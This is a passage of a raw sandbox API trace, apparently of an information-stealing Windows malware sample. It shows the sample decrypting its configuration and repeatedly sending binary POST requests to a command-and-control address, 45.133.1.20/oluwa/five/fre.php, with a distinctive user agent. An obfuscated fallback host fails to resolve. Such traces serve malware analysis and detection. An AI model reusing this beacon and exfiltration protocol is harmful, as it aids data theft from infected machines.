getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0281.051] GetProcessHeap () returned 0x6a0000 [0281.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0281.051] GetProcessHeap () returned 0x6a0000 [0281.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0281.052] GetProcessHeap () returned 0x6a0000 [0281.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0281.053] GetProcessHeap () returned 0x6a0000 [0281.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0281.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.054] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.060] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0281.069] GetProcessHeap () returned 0x6a0000 [0281.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0281.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.070] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0281.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.071] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.073] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.073] GetProcessHeap () returned 0x6a0000 [0281.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0281.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.075] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0281.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.076] CryptDestroyKey (hKey=0x6ad560) returned 1 [0281.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.077] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0281.077] GetProcessHeap () returned 0x6a0000 [0281.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0281.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.079] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0281.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.080] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0281.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.081] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0281.082] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.082] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0281.082] GetProcessHeap () returned 0x6a0000 [0281.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0281.082] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0281.082] GetProcessHeap () returned 0x6a0000 [0281.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0281.082] socket (af=2, type=1, protocol=6) returned 0xa38 [0281.083] connect (s=0xa38, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0281.109] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0281.109] GetProcessHeap () returned 0x6a0000 [0281.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0281.109] GetProcessHeap () returned 0x6a0000 [0281.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0281.110] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0281.111] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0281.111] GetProcessHeap () returned 0x6a0000 [0281.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0281.111] GetProcessHeap () returned 0x6a0000 [0281.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0281.111] GetProcessHeap () returned 0x6a0000 [0281.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0281.111] GetProcessHeap () returned 0x6a0000 [0281.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0281.113] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0281.114] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0281.114] GetProcessHeap () returned 0x6a0000 [0281.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0281.114] GetProcessHeap () returned 0x6a0000 [0281.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0281.115] send (s=0xa38, buf=0x6bd460*, len=242, flags=0) returned 242 [0281.115] send (s=0xa38, buf=0x6bb998*, len=159, flags=0) returned 159 [0281.115] GetProcessHeap () returned 0x6a0000 [0281.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0281.116] recv (in: s=0xa38, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0281.196] GetProcessHeap () returned 0x6a0000 [0281.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0281.197] GetProcessHeap () returned 0x6a0000 [0281.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0281.197] GetProcessHeap () returned 0x6a0000 [0281.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0281.198] GetProcessHeap () returned 0x6a0000 [0281.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0281.198] closesocket (s=0xa38) returned 0 [0281.199] GetProcessHeap () returned 0x6a0000 [0281.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0281.199] GetProcessHeap () returned 0x6a0000 [0281.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0281.199] GetProcessHeap () returned 0x6a0000 [0281.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0281.200] GetProcessHeap () returned 0x6a0000 [0281.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0281.200] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17d4) returned 0xa38 [0281.202] Sleep (dwMilliseconds=0xea60) [0281.206] GetProcessHeap () returned 0x6a0000 [0281.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0281.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.208] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.216] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0281.226] GetProcessHeap () returned 0x6a0000 [0281.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0281.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.227] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0281.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.229] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.230] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.230] GetProcessHeap () returned 0x6a0000 [0281.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0281.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.232] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0281.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.249] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0281.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.250] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0281.251] GetProcessHeap () returned 0x6a0000 [0281.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0281.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.252] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.253] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.254] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.256] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.256] GetProcessHeap () returned 0x6a0000 [0281.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0281.256] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0281.256] GetProcessHeap () returned 0x6a0000 [0281.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0281.257] GetProcessHeap () returned 0x6a0000 [0281.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0281.257] GetProcessHeap () returned 0x6a0000 [0281.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0281.258] GetProcessHeap () returned 0x6a0000 [0281.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0281.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.259] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.266] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0281.273] GetProcessHeap () returned 0x6a0000 [0281.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0281.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.276] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0281.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.277] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.278] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.278] GetProcessHeap () returned 0x6a0000 [0281.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0281.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.279] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0281.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.281] CryptDestroyKey (hKey=0x6ad020) returned 1 [0281.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.282] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0281.282] GetProcessHeap () returned 0x6a0000 [0281.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0281.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.283] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0281.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.284] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0281.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.286] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0281.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.287] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0281.287] GetProcessHeap () returned 0x6a0000 [0281.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0281.287] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0281.287] GetProcessHeap () returned 0x6a0000 [0281.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0281.287] socket (af=2, type=1, protocol=6) returned 0xa3c [0281.288] connect (s=0xa3c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0281.311] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0281.311] GetProcessHeap () returned 0x6a0000 [0281.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0281.311] GetProcessHeap () returned 0x6a0000 [0281.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0281.312] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0281.313] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0281.313] GetProcessHeap () returned 0x6a0000 [0281.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9930 [0281.314] GetProcessHeap () returned 0x6a0000 [0281.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0281.314] GetProcessHeap () returned 0x6a0000 [0281.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0281.315] GetProcessHeap () returned 0x6a0000 [0281.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0281.315] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0281.317] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0281.317] GetProcessHeap () returned 0x6a0000 [0281.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0281.317] GetProcessHeap () returned 0x6a0000 [0281.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0281.318] send (s=0xa3c, buf=0x6bd460*, len=242, flags=0) returned 242 [0281.318] send (s=0xa3c, buf=0x6bb998*, len=159, flags=0) returned 159 [0281.319] GetProcessHeap () returned 0x6a0000 [0281.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0281.319] recv (in: s=0xa3c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0281.399] GetProcessHeap () returned 0x6a0000 [0281.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0281.400] GetProcessHeap () returned 0x6a0000 [0281.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0281.401] GetProcessHeap () returned 0x6a0000 [0281.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9930 | out: hHeap=0x6a0000) returned 1 [0281.402] GetProcessHeap () returned 0x6a0000 [0281.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0281.402] closesocket (s=0xa3c) returned 0 [0281.402] GetProcessHeap () returned 0x6a0000 [0281.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0281.403] GetProcessHeap () returned 0x6a0000 [0281.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0281.403] GetProcessHeap () returned 0x6a0000 [0281.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0281.404] GetProcessHeap () returned 0x6a0000 [0281.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0281.405] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17d8) returned 0xa3c [0281.408] Sleep (dwMilliseconds=0xea60) [0281.412] GetProcessHeap () returned 0x6a0000 [0281.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0281.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.416] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.439] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0281.463] GetProcessHeap () returned 0x6a0000 [0281.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0281.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.471] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0281.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.499] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.504] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.504] GetProcessHeap () returned 0x6a0000 [0281.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0281.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.509] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0281.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.511] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0281.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.515] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0281.515] GetProcessHeap () returned 0x6a0000 [0281.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0281.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.516] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.523] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.526] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.527] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.527] GetProcessHeap () returned 0x6a0000 [0281.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0281.527] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0281.528] GetProcessHeap () returned 0x6a0000 [0281.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0281.531] GetProcessHeap () returned 0x6a0000 [0281.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0281.532] GetProcessHeap () returned 0x6a0000 [0281.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: 